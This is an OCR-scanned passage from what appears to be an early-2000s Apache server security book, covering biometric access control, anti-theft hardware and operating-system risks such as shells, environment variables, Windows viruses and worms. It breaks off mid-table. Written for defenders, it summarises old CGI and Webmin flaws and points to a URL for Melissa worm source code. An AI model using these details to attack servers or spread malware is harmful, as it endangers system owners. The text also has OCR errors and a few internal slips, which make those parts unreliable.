Galton significantly advanced biometric identification when in 1893 he demon- 
strated that no two human’s fingerprints were alike, even in cases of identical twins. 


Sir Edward Henry exploited this when he developed the Henry System of fingerprint 
analysis, which, though waning, is still in use today. Henry’s system classified our 
fingertip ridges into loops of varying dimension. By analyzing these and establishing 
eight to sixteen points of comparison between samples, cops could positively iden- 
tify criminals. 


NOTE 


Fingerprint analysis is lauded as infallible, and in most cases it is—providing the target has 
fingerprints. Not everyone does. Some skin diseases distort fingerprints or deny them alto- 
gether. One example is epidermolysis, an inherited condition that mostly attacks unborn chil- 
dren. Epidermolysis victims sometimes have partial fingerprints, and sometimes none at all. 
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Until the mid-20th century, fingerprinting technology was surprisingly primitive. 
Obtaining and analyzing prints involved direct physical hand-to-ink impressions. 
Armed with these prints, which were stored on paper cards, criminologists made 

visual comparisons against samples from crime scenes. 


More advanced technology has since surfaced. Today, the FBI stores 200 million 
fingerprints (29 million of which are unique) using the Fingerprint Image Compression 
Standard (FICS). FICS provides digital, space-efficient storage, and reduces terabytes of 
data to a fraction of their original size. And, as you might expect, computers now do 
most of the matching digitally. 


Contemporary digital fingerprinting technology is now inexpensive enough that 
vendors can incorporate it into PCs. Compaq, Sony, and many other manufacturers 
now Offer fingerprint ID systems for PC models, and this trend is growing. Such 
systems capture your prints with a camera and use the resulting image to verify your 
identity. 


Fingerprints are merely the beginning, though. In recent years, scientists have used 
several unique biological characteristics to reliably identify users, and of these, 
retinal patterns offer high assurance levels. 


The retina, which handles peripheral vision, is a thin optical tissue that converts 
light to electrical signals and then transmits them to your brain. Retinal scanners 
focus on two retinal layers. One, the outer layer, contains reflective, photoreceptive 
structures called cones and rods that process light. Beneath these, in the choroid 
layer, the retina houses complicated blood vessel systems. 


Retinal scans bombard your eye with infrared light, causing the cones and rods to 
reflect this light. The resulting reflection in turn reveals an imprint of your retina’s 
blood vessel patterns. These patterns, and in some cases, their digital or crypto- 
graphic values, constitute your retinal “fingerprint.” 


Experts report that retinal scans are largely superior to fingerprints for identification 
purposes. Retinal patterns, for example, offer more points for matching than finger- 
prints do (anywhere from 700 to 4,200). For this reason, experts class retinal scan- 
ners as high biometrics, or biometric systems with exceptionally high degrees of 
assurance. 


Indeed, only in rare cases are retinal scans insufficient, such as where users are blind, 
partially blind, or have cataracts. If anything, retinal scanners are too sensitive. They 
will sometimes bear disproportionately high false negative or rejection rates. That is, 
almost no chance exists that a retinal scanner will authenticate an unauthorized 
user, but it might reject a legitimate one. 


More recent technology focuses on voice patterns, but such systems can be unreli- 
able. Instances can arise where voice recognition fails because the user has bronchi- 
tis, a cold, laryngitis, and so forth. 
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Using Biometric Access Control Devices 


There are pros and cons to biometric access control. On the one hand, such controls 
offer extreme assurance. On the other, practical obstacles exist to instituting a wholly 
biometric approach. 


First, when expanding biometric controls beyond the scope of your own worksta- 
tion, you face privacy issues. For example, suppose you decide to institute biometric 
access controls enterprise-wide. Even if your employees sign a release, they could 
later sue for invasion of privacy, and perhaps prevail. 


NOTE 


Privacy concerns are more real than imagined. Experts say that retinal scans can detect drug 
abuse, hereditary disease, and even AIDS. Maintaining a retinal pattern database could there- 
fore expose you to litigation. Fingerprints can reveal criminal convictions, too, which also 
constitute sensitive data. For a closer look at these techniques and their implications, check 
out A Primer on Biometric Technology, a PDF file located at http: //www.rand.org/publica- 
tions /MR/MR1237/MR1237.ch2.pdf. 





Biometric access controls also have social implications. Even if your employees don’t 
voice it, they might resent such controls, and see them as a privacy violation. This 
could cultivate a hostile work environment, even if not overtly. 


Perhaps the strangest drawback of biometric access controls, though, is their sheer 
effectiveness, an issue to consider before deploying them. Most biometric systems 
perform at least simple logging, and thus create an incontrovertible record of whom 
did what and when they did it. In lawsuits or criminal actions, your opponents 
could use your biometric system’s records against you, as the logs could deprive your 
personnel of plausible deniability. 


Finally, biometric access controls are impractical in environments that extend 
beyond your local network. You can’t, for example, force remote users to use biomet- 
ric devices, nor do all remote systems offer biometric support. 


These issues aside, biometric access controls are excellent when used in-house, in 
close quarters among trusted co-workers. I recommend using them in your inner 
office on machines used to control and administrate your network. 


To learn more about biometric identification, check out these sites: 


e Biometrics: Promising Frontiers for Emerging Identification Markets; MSU-CSE-00-2; 
Anil K. Jain and Lin Hong and Sharath Pankanti; February 2000. 
http: //www.cse.msu.edu/publications/tech/TR/MSU-CSE -00-2.ps.gz. 
(PostScript and gzipped) 
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e Biol (http: //www.bio1.com )—A resource for papers, statistics, standards, and 
studies. 


e A View From Europe 
(http: //www.dss.state.ct.us/digital/news11/bhsug11.htm)—An interview 
with Simon Davies that focuses on biometric privacy issues. 


e Fight the Fingerprint (http://www. networkusa.org/fingerprint.shtml)—A 
group that sees a biometric future (and doesn’t like it). As their opening page 
explains: “We Stand Firmly Opposed to All Government Sanctioned Biometrics 
and Social Security Number Identification Schemes!” 


e The BioAPI Consortium (http: //www.bioapi.org/)—This group was established 
to help developers integrate biometric identification into existing standards 
and APIs. 


e The Biometric Consortium (http: //www.biometrics.org/)—(“...the US 
Government’s focal point for research, development, test, evaluation, and 
application of biometric-based personal identification/verification 
technology...”) 


Anti-Theft Devices 


Still another threat is theft, either of your entire system or its individual compo- 
nents. (Thieves need not steal your server. They can remove hard disk drives, 
memory, or expansion cards.) The following section lists various tools that can help 
you secure your system or these components. 


Laptop Lockup 
URL: http://www. laptoplockup.com/ 


Laptop Lockup prevents laptop theft using tamper-resistant steel cables and a brass 
padlock. These attach the laptop to a desk or table. The product supports a wide 
range of laptops, PowerBooks, and such. 


FlexLok-50 
URL: http://www. pioneerlock.com/ 


FlexLok-50 locks down workstations with 1/2-inch wire rope cabling that will resist 
bolt cutters, wire cutters, and hacksaws. Pioneer also offers bottom-plate systems that 
attach workstations to tables and desks. 
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Computer Guardian 
URL: http: //www.bigfish.co.uk/business/guardian/ 


Computer Guardian is a non-platform-dependent anti-theft system for PCs. It 
consists of an expansion card and software (on an external diskette). When the PC is 
moved or its components are tampered with, the system emits a loud siren likely to 
scare the thief and alert others. 


PHAZER 


URL: http: //www.computersecurity.com/fiber/index.html 


Do you have a large network? PHAZER is a fiber-optic security device that detects 
physical tampering. This monitoring system relies on a closed loop of fiber-optic 
wire. If the loop is broken, an alarm is generated. PHAZER is great for securing 
university computer labs or other large networks. 


Unique Numbers, Marking, and Other Techniques 


Also consider taking steps to uniquely identify your system in case it’s stolen later. 
Thousands of computers disappear each year and victims rarely recover them, even 
after the police investigate. Some users fail to keep receipts, others fail to jot down 
serial numbers, and so on. Without taking these measures, after a criminal reformats 
the drives, you’d have a difficult time identifying your machine. 


Some safeguards that can help law enforcement include the following: 


e Maintain meticulous records on all your hardware, including model and serial 
numbers. You’ll need these later. It’s often not enough that you can recognize 
your machine by its dings, cracks, and crevices. Police usually demand some- 
thing more substantial, like serial numbers, bills of sale, and so on. 


e Permanently mark your components with unique identifiers, using indelible 
ink, fluorescent paint, or UV paint/ink (which appears only under black light). 
Mark your motherboard, expansion cards, disk drives, the unit casing’s interior 
and exterior walls, and your monitor. 


In addition, investigate proprietary marking or ID solutions. Two in particular are 
STOP and Accupage. 
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STOP 
URL: http://www. stoptheft.com/ 


STOP is a two-tiered theft prevention and identification system. First, an indelible 
chemical tattoo is etched into your hardware. This tattoo contains a message that 
identifies the equipment as stolen property. Over this, a special metal plate is fash- 
ioned that will adhere even under 800 pounds of pressure. Thieves can only defeat 
STOP by physically cutting away the tattooed, plated chassis. 


Accupage 
URL: http://www. accupage.com/ 


Accupage is a hardware system that embeds an indelible message containing the PC’s 
rightful owner’s identity into the PC. Police can later examine this message to deter- 
mine ownership, and whether the PC has been stolen. Accupage is being integrated 
into some new laptops, but older desktop systems can be retrofitted. 


Summary 


Physical security is about common sense. Wherever possible, implement all security 
procedures proscribed by your hardware manufacturer. (In particular, watch for 
default passwords and such.) Also, if you’re currently using used network hardware, 
it’s worth tracking down supplemental documentation on the Internet. Older 
network hardware might harbor various flaws. Perhaps the best tip is this: Take every 
precaution to prevent unauthorized users from gaining physical access to your 
servers or network hardware. 


4 


Environmental Hazards: 


Apache and Your 
Operating System 


This chapter covers environmental hazards you'll face— 
hazards over which Apache often has little or no control. 


Apache and Your Underlying Operating 
System 


The number of operating systems on which Apache runs 
accounts for why Apache commands more than 55% of 
the Web server market. The list is long: 


Aix 

AUX 

BeOS 
BS2000-OSD 
BSDI 
CygWin 
Darwin 
DGUX 
Digital Unix 
FreeBSD 
HP-UX 

IRIX 


Linux 


IN THIS CHAPTER 
e Apache and Your Underlying 
Operating System 


e Environmental Risks Common 
to Unix 


e Environmental Risks Common 
to Windows 


e Other Environmental Risks 
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e Mac OS X 

e Mac OS X Server 
e NetBSD 

e NetWare 

e OpenBSD 

e OS/2 

e OS/390 

e OSF/1 

e QNX 

e Reliant Unix 

e Rhapsody 

e Sinix 

e Solaris 

e SunOS 

e UnixWare 

e Win32 

e Windows NT, 2000, and XP 


Taken alone, Apache has a good security record, especially compared to other Web 
servers. However, Apache can’t render an insecure underlying infrastructure secure. 
You must do this yourself, and one factor that will influence your risk level is your 
operating system. 


Choosing Your Operating System 


Luckily, Apache’s modularity and portability offer you many options. Indeed, 
Apache needn’t drive your platform choice at all. Instead, you’ll choose—or should 
choose—your operating system based on other factors, including the following: 


e The technical support you require 
e How your Web server integrates with your overall enterprise 
e The level of development you intend to undertake 


e What functions your Web server will serve 
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Technical Support 

Technical support: some folks need it, some folks don’t. Perhaps you're an Internet 
god or goddess who dreams in C, sockets, and SQL. Perhaps you're so deep into the 
Net that you construct raw packets at your terminal (and cackle wildly as you do it). 
If so, technical support means nothing to you. Not everyone is there yet, though. 


Some organizations and businesses require technical support, and write it into any 
contracts they establish with vendors. More often than not, this is because such 
organizations are large and frequently lose employees. To ensure that their 
Webmaster—which they conceptualize more as an HR entity than a person—can 
pick up that phone, they’re willing to spend money. Such organizations usually rule 
out freebie operating systems that ship without support (OpenBSD, for example). 


Web Server Integration 
Another factor to consider is the degree to which Apache will mesh into your overall 
enterprise. This can unfold in various ways: 


e You're establishing a Web server merely to establish a Web presence. The Web 
site will carry nothing but promotional or support materials, and it’s a vanity 
site or a perfunctory measure. You’re doing it because you have to, and Apache 
will stand alone, as a sacrificial server, outside your firewall. This amounts to 
zero integration. 


e You're establishing a Web server to keep your client base up-to-date on your 
enterprise’s activities. Part of this scenario is that you'd like seamless updating 
from an internal database to the Web server outside your firewall. However, 
your database people inside know little about Apache, FTP, SSH, and so on. 
They merely need an easy way to move the data over. This is moderate 
integration. 


e You're establishing a Web server because you’re migrating your enterprise to an 
intranet. Therefore, the Web server is an integral part of your day-to-day busi- 
ness. It must tie in with custom-written applications in Java, ActiveX, COM, 
CORBA, XML or other technologies that your enterprise cannot survive 
without. This is deep integration. 


Zero integration is not a reason to choose Linux just to save money. Rather, if your 
organization doesn’t use Linux inside, and no one inside knows Linux well, Linux is 
a terrible choice. You or your Webmaster must know the operating system on which 
Apache runs. True, you might not care whether the machine gets cracked because it 
doesn’t store irreplaceable data. However, it will cost your staff a fortune in time to 
reinstall every time attackers bring it down. 


Moderate integration invites the widest possibilities. Here, you could choose almost 
any operating system that your IS staff knows well. Most systems can now talk to 
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multiple operating systems, even if only in degrees. For example, Windows supports 
AppleTalk and NFS. Similarly, Unix and Linux both offer Samba, and can therefore 
emulate a file server for Windows machines. So, if moderate integration is your gig, 
concentrate on price, technical support, or Apache’s function. There you'll find the 
answer. 


Deep integration significantly narrows your options. Here you must choose an oper- 
ating system that your development team knows well, and one that supports all 
technologies on which your enterprise relies. In other words, stick with a chosen 
operating system and implement it across the board. Doing otherwise will bring you 
grief. 


Development Projects and Choice of Operating System 
Chances are that if you chose Apache for serious development, there’s money in the 
mix. Some common scenarios: 


e Your firm pitched a concept to a partner or venture capital outfit. They 
provided you with capital to produce a proof-of-concept system “in the small.” 
This means that the system you’re developing need only demonstrate a micro- 
cosmic version of what will later become an enterprise application. In other 
words, it’s a speculative venture. 


e You're developing an application locally for an outfit elsewhere, and you’re 
trying—without costing yourself a fortune—to approximate their production 
environment. 


e You're developing generic applications (CGI, for example) for general use by 
folks who will deploy these solutions in widely disparate environments. 


e You're taking a business out of the Stone Age into the light. In the process, 
you're porting many of their core workflow patterns and daily tasks to either a 
partially or fully Web-enabled environment. 


Here, only the first, second, and last scenarios narrow your options. In the first— 
where you’re developing a proof-of-concept system—you should adhere closely to 
what the “real” system will be. If you don’t, your partners won’t see (and you won’t 
be able to quickly implement) a ramp-up path to the finished product. Hence, if the 
tricked-out system demands SPARCstations, Solaris, Oracle Application Server, Oracle 
8i or 9, and JSP, then choose Linux, Apache, Tomcat, Jrun, JSP, and MySQL. It’s no 
cigar, but it’s close. 


Similarly, if you’re locally developing a system for deployment on remote servers, 
you’ve got to simulate the remote environment as closely as you can. If it’s OS/390, 
that’s a bummer, but you still have to do it. 
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Finally, in the last scenario—where you're upgrading an entire enterprise—choose an 
operating system that approximates what they’ve been using. For example, perhaps 
they’ve been running a Novell shop. That’s a distinctive operating system, and if 
they weren’t running Windows on top of it, you’re stuck with Novell, as they’ll 
likely stick with it, too. No problem, though: Apache supports Novell. 


Your Web Server’s Function 

Finally, you’ll consider your Web server’s function. What will it do? What data types 
will it support? Who will access it and why? All these issues, although less pressing 
than those mentioned previously, will drive your decision. 


Why So Much Talk About Operating Systems? 


At this point, you have to be wondering: Why all the fuss about which operating 
system you choose? The answer is this: Operating systems are complicated environ- 
ments, and even skilled users unwittingly conform to the infamous 80/20 rule: 


Eighty percent of users use only twenty percent of the features of any given application or 


operating system. 


For example, I’ve been using Microsoft Word since time immemorial. Indeed, I’ve 
been using Word so long that I’m an expert in WordBasic, an embedded macro 
language that Word offered, pre-VBA. Despite this, Word offers many other features 
I’ve never used and never will. I’m not even aware of many of them—and Word is 
merely one application. 


The box I used to write this book (at the moment I wrote this) stored 98,334 files. Of 
these, better than one third were application files, executables, or system libraries. Of 
that number, I’ve inspected about 10%. Of the remaining files, I know little about 
them, their contents, or even their function. 


Similarly, whatever operating system you choose, it’s sure to support several dozen 
protocols or services you don’t know well. Many of these will likely offer networked 
access to local services, and this will become even more prevalent as the years pass. 
Users want total network integration, where they can do anything, anywhere, at any 
time. Market forces are thus driving us closer and closer to an intricately wired 
world. Each such service or protocol increases the risk that crackers will gain unau- 
thorized access to your Web host. 


Beyond this, some operating systems have poor security, and there’s nothing Apache 
can do about it (such systems include Microsoft Windows 95, 98, ME, and so on). 
On these systems—which have little or no access control—Apache can reach into the 
file system and do whatever it likes. Under such conditions, if attackers do find a 
way to crack your Apache distribution, they’ll obtain carte blanche access, and if 
they want, destroy your file system and all data therein. 
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For this reason, except on closed, private networks (or machines that will never see 
Internet access), rule out the following systems: 


e BeOS prior to versions 4.5 
e Microsoft ME 

e Microsoft Windows 3.1 

e Microsoft Windows 95 


e Microsoft Windows 98 


Note that you can secure Microsoft Windows NT and 2000 (the jury is still out on 
XP). However, the aforementioned Microsoft operating systems substantially 
contribute to Microsoft leading the pack for vulnerabilities. 


Figure 4.1 demonstrates vulnerabilities among several popular operating systems 
since June 1997. 
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FIGURE 4.1 Vulnerabilities by operating system, June 1997—January 2002. 


Microsoft commanded a staggering 63%, or some 500 vulnerabilities during that 
time. To its credit, in recent months, Microsoft has undertaken a major policy shift 
and is now allocating substantial resources to improving its product security. 
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NOTE 


The statistics for Figure 5.1 came from SecurityFocus’ (http: //www.securityfocus.com) secu- 
rity vulnerability list. SecurityFocus is an excellent resource for up-to-the-minute information 
on vulnerabilities. Its archive reaches back to 1989. 


Clearly then, your choice of operating system has a strong bearing on your Web 
host’s security. Each operating system introduces additional environmental risks that 
you must address. Let’s look at those now. 


Environmental Risks Common to Unix 
Unix has two chief environmental risks to consider: 
e Shells 


e Unix’s inherent complexities 


Because we’ve already covered running services in Chapter 2, “The Risks: Cracking 
Apache,” we’ll move on to shells and Unix’s inherent complexities. 


Shells 


Like Windows, Unix relies on one or more command interpreters, or shells. Shells 
accept user commands from a keyboard (or other sources) and communicate these to 
the underlying operating system. From there, several things can happen, although 
generally, shells find the command the user invoked, execute it, and return either 
standard output (STDOUT) or standard error output (STDERR). 


With the exception of logging, CGI, and SSI operations, Apache doesn’t much use 
shells. However, that’s rather like saying that except for generic user commands, 
Windows rarely uses COMMAND.COM. Most Apache administrators will eventually want 
to pipe logs to processes, run CGI, and incorporate Server Side Includes in at least 
some of their projects. 


Shells you’ll encounter in Unix environments (and at least in one case, Windows 
2000) include the following: 


e ash 
e bash 
e csh 
e ksh 


e sh 
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e tcsh 


e zsh 


We'll cover secure programming in Chapter 12, “Hacking Secure Code: Apache at 
Server Side,” and Chapter 13, “Hacking Secure Code: Apache at Client Side,” but 
here, it’s worth noting that anytime Unix spawns a shell, the potential for security 
issues arises. Indeed, attackers often (but by no means always) accelerate their privi- 
leges or circumvent security controls by forcing Apache to call a shell. 


In many instances, Web server security breaches arise not because Apache has any 
inherent security weakness, but instead because attackers find ways to invoke shells 
on the target. After having achieved this, attackers can push malicious code onto the 
shell’s argument stack. The shell—unaware that this code is unwanted and unautho- 
rized—dutifully executes it. 


One cause of such mishaps is that system administrators, developers, and Web 
administrators fail to filter or otherwise validate user input. When this happens, 
attackers can sometimes use metacharacters (special characters that shells interpret in 
unique ways) to execute malicious code. In Chapters 12 and 13, we’ll address these 
issues at length, but here, a single example will suffice. 


On December 31, 2001, a user calling himself BrainRawt revealed a weakness in a 
popular CGI tool named Last Lines. Last Lines, from Matrix’s CGI Vault, is a free, 
Perl-based CGI tool that prints x number of lines from a specified log file to a speci- 
fied Web page. It’s a tool to monitor your logs remotely through a Web interface. 


BrainRawt found that Last Lines 2.0, when coupled with Apache 1.3.17, 1.3.18, 
1.3.19, 1.3.20, and 1.3.22, left a gaping security hole. The script didn’t filter 
metacharacters properly, and therefore enabled remote attackers to examine any 
Web-readable directory. On servers where administrators foolishly placed htpasswd 
password databases within the Web directory hierarchy in either plain text or DES- 
encoded files, attackers could obtain username/password pairs. This could, under 
certain circumstances, enable attackers to gain not merely unauthorized Web access, 
but also root access. 


Another shell issue surrounds environment variables. Environment variables—either 
those that developers permanently set at login or startup, or those that they set at 
runtime—have a strong bearing on program execution. If attackers can somehow 
introduce erroneous environment variable values, they can alter a program’s behav- 
ior, and perhaps instruct it to perform unwanted and unauthorized tasks. Table 4.1 
identifies several such variables. 
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TABLE 4.1 Shell Environment Variables 

Variable Purpose 

$- The $- variable stores the current shell’s flags. 

$! The $! variable stores the PID of the last command executed in the background. 

$# The $# variable stores the number of positional parameters ($1, $2, $3, and 
so on). 

$$ The $$ variable stores the PID of the current shell. 

$0 The $0 variable stores the name of the program currently being executed. 

$CDPATH The CDPATH variable identifies the search path used when you issue the cd (change 
directory) command. 

$HOME The HOME variable identifies the location of your home directory. 

$IFS The IFS (Internal Field Separator) shell variable stores the character used for field 
separation. 

$LIBPATH The LIBPATH variable identifies the search path for shared libraries. 

$LOGNAME The LOGNAME variable stores your username. 

$MAIL The MAIL variable stores the location of your mailbox. (From this, the shell knows 
where to find your mail.) 

$PATH The PATH variable stores a list of all directories the shell will search when looking 
for commands. 

$PS1 The PS1 variable identifies what your system prompt will look like. For example, 
on my machine, the Ps1 variable is set to $. 

$SHACCT The SHACCT variable stores a filename (a file which is writable by the current user) 
that stores an accounting record of all shell procedures. 

$SHELL The SHELL variable stores the shell’s path. 

$TERM The TERM variable identifies the current terminal type. Your terminal type can be 
very important. Unix uses this to determine how many characters and lines to 
display per screen. 

$TIMEOUT The TIMEOUT variable (Unix) stores the number of minutes of inactivity before 
which the shell exits. 

$TZ The TZ variable identifies the current time zone. For manipulation of time zone 


values in VC++ (including _daylight, timezone, and _tzname) check the _tzset 
function, available from time.h. If you don’t set TZ beforehand, programs grab 
time zone variables from the operating system’s current settings. 





Apache does not include utilities that scrupulously investigate either characters or 
shell environment variables, nor should it. This isn’t Apache’s job. You must address 
these issues independently. 


We'll study environment variables in Chapters 12 and 13, but one example is worth 
revisiting. On May 26, 2001, J. Nick Koston, an independent researcher, identified a 
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serious vulnerability in Webmin when incorporated with Apache. Versions Webmin 
0.5x, Webmin 0.6, Webmin 0.7, Webmin 0.8.3, Webmin 0.8.4, Webmin 0.80, and 
Webmin 0.85 were all affected. 


Webmin is a management system for Apache servers, written in Perl, that enables 
Web administrators to manage a Web host (including the greater file system’s secu- 
rity and which daemons run). The problem Mr. Koston demonstrated was that 
Webmin’s Perl-based CGI could, under certain circumstances, reveal your login and 
password in a mime-64-encoded URL that carried these values as environment vari- 
ables. Under certain conditions, this gave attackers root access. 


Unix’s Inherent Complexities 


Another inherent risk of Unix is its complexity. Few systems harbor as many utilities 
as Unix does—and many such utilities aren’t apparent to new users because they 
reside in the underlying file system. (The X Window System gives no indication of 
their existence.) 


As I'll relate in Chapter 8, “Overlording Apache Server: General Administration,” 
these utilities carry widely disparate permissions. Some—although they remain in 
the minority—even demand root or administrative access. When a hole surfaces in 
any such utility, it can place your system at risk. 


Furthermore, managing permissions on Unix systems can be cumbersome and 
complicated. Sometimes this is a file system issue (the default installation applies 
erroneous permissions), sometimes it’s an administrative issue (you erroneously 
assign permissions), and sometimes it’s a software problem (third-party tool authors 
set incorrect or overly permissive access rights in their packages). 


Finally, Unix supports shell accounts, and in many situations, such as where you 
have multiple programmers working on a development project, you’ll likely grant 
one or more individuals shell access. You might provide this access locally, through 
telnet, rlogin, or ssh, but it amounts to the same thing: shell access. 


Never grant shell access frivolously. If you can provide users or your developers with 
critical services without giving them shell access, do it. Shell access invites trouble. 
The more users that have shell access, the more likely that you’ll experience an inter- 
nal security breach. 


NOTE 





Mischievous shell users can exploit files and services that remote attackers can’t. A remote 
attacker must first gain shell access before exploiting internal holes; a valid shell user is already 
halfway there. But shell users needn't be malicious to cause problems. Even innocent behavior 
can erode security, such as when users create rhosts files. 
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Unix vulnerabilities attributable to and accessible by remote users exceed remote 
vulnerabilities by a huge margin—at least 30 to 1. That is, for every remote hole 
Unix has had since 1989, it’s had 30 local holes—holes that only folks with shell 
access can exploit. 


Hence, when building a Unix network, if you must grant users shell access, reduce 
your risks by taking these steps: 


e Dedicate a machine specifically for shell access. 
e Restrict that machine to shell use only. 
e Strip it of nonessential network services. 


e Install a generic application set and partition the drives with disaster recovery 
in mind. (In other words, expect frequent reinstallations. Shell machines get 
thrashed regularly.) 


e Prohibit relationships of trust between shell and other machines. 


e Redirect logs to a log server, or, if your budget permits, write-once media, and 
log everything. 


Equally, if you’re setting up just a single Unix box, the same basic rules apply—grant 
shell access only to those who need it. Indeed, be wary of granting shell access to 
anyone (other than you, of course) that hacks or cracks. Otherwise, besides the risk 
that they might trash your machine, you might end up taking the rap for something 
they did from your IP. 


Environmental Risks Common to Windows 


Windows harbors the same inherent weaknesses that Unix does, plus a few more. 
Certainly, Windows account access is similar in scope and risk to Unix shell access. 
Moreover, Windows security also depends in some degree on environment variables, 
and attackers can exploit that. Table 4.2 lists common Windows environment vari- 
ables. 


TABLE 4.2 Environment Variables in Windows 





Variable Purpose 

A-MSSQL - DATABASE Microsoft SQL Server-related; specifies the database to be accessed 

A-MSSQL -LOGIN Microsoft SQL Server-related; specifies the username you'll use to 
connect to the database 

A-MSSQL - PASSWD Microsoft SQL Server-related; specifies the password for the user 


associated with the A-MSSQL-LOGIN variable 
BASEDIR The build’s base directory 
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TABLE 4.2 Continued 





Variable 


Purpose 





BUILD_DEFAULT 


BUILD_DEFAULT_TARGETS 
BUILD_MAKE_PROGRAM 


BUILD_OPTIONS 


C_DEFINES 
cc 


CCX 


CFLAGS 
CLASSPATH 
COMPSPEC 


CRT_INC_PATH 
CRT_LIB_PATH 
CVS_CLIENT_LOG 
CVS_CLIENT_PORT 


CVS_PASSFILE 
CVS_RCMD_PORT 
CVS_RSH 
CVS_SERVER 


CVSEDITOR 
CVSIGNORE 
CVSROOT 
CVSUMASK 


CVSWRAPPERS 
CXXFLAGS 
CYGROOT 


DB2PATH 
DBI_TRACE 
DBI_USER 
DDK_INC_PATH 
DDK_LIB_PATH 


Default arguments you'd like to always pass to build 

Default switches you’d like to always pass to build 

Your build make utility (generally, nmake . exe) 

Specifies that build should traverse additional, optional directories 
when building a project 

Switches you'll always pass to the C compiler 

MySQL-related; points to your C compiler (needed when using the 
configure utility) 

MYSQL-related; points to your C++ compiler (needed when using 
the configure utility) 

Specifies the flags for your C compiler (MySQL) 

The path to your Java classes 

Tells cmd.exe (or command. com) where it loaded to reconcile the 
shell’s accounting of transient versus resident memory portions 
The location of W2K include files 

Microsoft C-based import libraries 

The debug log for CVS in client-server mode 

When using CVS in concert with Kerberos authentication, this 
specifies the CVS client port 

The CVS password file 

Specifies the RCMD port to use w/CVS 

When using CVS with rsh, this specifies the rsh program to use 
When using CVS with rsh, this specifies the location of the CVS 
server 

Specifies the editor to use when working with CVS 

Filename patterns that CVS should always ignore (CVS) 

The directory of CVS’s root depository 

Specifies file permissions of files created by CVS (Note that if you 
use CVS in Windows, you might experience file permission prob- 
lems. If you're accessing CVS via SAMBA, you can fix these by 
specifying WRITE=YES in your SAMBA config file.) 

Filename patterns that CVS should use as wrappers 

Specifies the flags for your C++ compiler (MySQL) 

Related to Cygnus tools (CygWin development suite), and specifies 
Cygwin’s home 

Points to the DB2 CLI location 

Specifies tracing in Perl DBI (MySQL) 

Specifies the default user name for Perl DBI (MySQL) 

Path to Microsoft’s DDK header files 

Path to Microsoft’s DDK library files 
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Variable 


Purpose 





ERRNO 


FLEXLM_BATCH 


FLEXLM_DIAGNOSTICS 


HOME (MYSQL) 
HOMEDRIVE 
HOMEPATH 
INCLUDE 
INFORMIXDIR 
IS08859 


JAVA_HOME 

LIB 

LINENO 
LM_LICENSE_FILE 
LOGONSERVER 
MAKE_MODE 
MSDevDir 


MYSQL_PWD 
MYSQL_TCP_PORT 
NTVERSION 
NUMBER_OF_PROCESSORS 
ODBC 

ORACLE_ 

ORACLE_HOME 

os 

PATHEXT 


PROCESSOR_ARCHITECTURE 
PROCESSOR_IDENTIFIER 
PROMPT 

PYTHONPATH 


RCSBIN 
SQLSERVER 


The last error condition returned by system calls (Korn Shell, which 
runs on W2K) 

Relates to FLEX license manager; prevents popup notifications from 
appearing 

Relates to FLEX license manager; gives you extra diagnostics (for 
tools that don’t generate debug logs) 

The mysql_history file locale 

A sensitive variable, this specifies the default drive (typically C:) 
The default directory for Windows users on the current box 

Your include file path 

Points to the ESQL/C path 

CVS-related variable that specifies that the system should use ISO- 
Latin-1 text file encoding 

Java’s home directory (C:\Java, JDK1.1.8, and so on) 

Your library path 

Current line number of a script (ksh) 

The license manager file location (FLEX) 

The name of the logon server 

Describes the make mode (Unix or Windows) 

The development directory, or wherever you have Visual Studio 
installed 

The default mySQL password (Don’t set this.) 

The default TCP/IP port for use with MySQL 

A legacy variable; reports the version 

The number of processors on the current system 

Points to the ODBC library and header files 

Points to Oracle’s path 

Points to Oracle’s path 

Identifies the operating system 

This is a sensitive environment variable, because it specifies 
executable file extensions (for example, *.exe, *.com, *.cmd, and 
so on) 

The current machine's processor architecture (generally X86, but 
could be MIPS or Alpha) 

Processor ID of the user’s workstation, as in x86 Family 5 Model 2 
Stepping 4, Genuinelntel 

The command prompt style 

The path to Python’s distribution 

The path to binary files (CVS) 

Points to the DB-Library path 
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TABLE 4.2 Continued 





Variable Purpose 

SWING_HOME The location of the Swing libraries (Java) 

SYBASE Points to the location of CT-Library or DB-Library 

SYSTEMROOT The location of Windows NT’s root directory (typically, C: \WINNT) 

TARGETLIBS Points to SDK libraries (\kerne132.1ib. user32.lib and so on) 

TCL_LIBRARY The TCL library location 

TMOUT Stores the number of minutes of inactivity before which the shell 
exits 

TMP or TEMP A directory for storing temporary files 

USER The default Windows user in relation to mysqld 

USERDOMAIN The user’s current domain 

WDM_INC_PATH Path to Microsoft WDM header files 

WINDIR See SYSTEMROOT 





Beyond the issues already mentioned, Windows has other problems, including a 
historically high susceptibility to viruses, worms, and denial-of-service (DoS) attacks. 


Tens of thousands of viruses for Windows exist, and more surface each day. Many 
have evolved, from simple MBR and data file viruses. Some spread like wildfire. 
(Viruses for Unix are rare, merely because Unix’s permissions scheme and structure 
make it an inhospitable environment.) Hence, if you choose Windows, build the 
price of a good virus scanner—and annual license updates—into your total cost. 


Worms represent a similar issue, but are far more threatening. Worms are like viruses, 
in that they can pass via file attachments, but these travel laterally. That is, they can 
infect one machine and then rifle through that machine’s files for addresses of other 
targets. After worms identify these other targets, they commandeer services on the 
originally infected machine, and use them to seek out and infect other machines. 


The most instructive example is Melissa, a worm that a New Jersey resident report- 
edly released on March 26, 1999. The man packaged Melissa as a Word 97 macro 
virus, but Melissa had characteristics security experts hadn’t seen before, at least not 
on that scale. Melissa’s author released it into a Usenet group, and just 72 hours 
later, the Computer Emergency Response Team reported more than 100,000 
confirmed infected hosts. 


An advisory from the Department of Energy’s Computer Incident Advisory 
Capability solemnly reported that even their systems were not immune: 


A new Word 97 macro virus named W97M.Melissa has been detected at multiple DOE sites 
and is known to be spreading widely. In addition to infecting your copy of Microsoft Word, 
the virus uses Microsoft Outlook 98 or Outlook 2000 to e-mail the infected document to the 


first 50 people from each of your Outlook address books. 
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CIAC Information Bulletin, J-037A: W97M.Melissa Word Macro Virus. 
(http: //www.ciac.org/ciac/bulletins/j-037.shtm1l) 


NOTE 


If you’re interested in running Melissa in a test environment, get the source code at 
http://john.helgo.net/~john/files/melissa.txt. 





Finally, Windows has a long record of DoS weaknesses, and many of these illustrate 
succinctly why and how your operating system can undermine Apache’s otherwise 

excellent security. More than a dozen Windows utilities, services, or applications— 

that have no relation to Web services—have harbored denial-of-service weaknesses. 
Table 4.3 lists a few examples. 


TABLE 4.3 Significant Windows DoS Vulnerabilities 


Attack 


Description 





MSDTC DoS 


Site Server DoS 


XP .manifest DoS 


MSIE Form DoS 


This affects Microsoft Distributed Transaction Service Coordinator on 
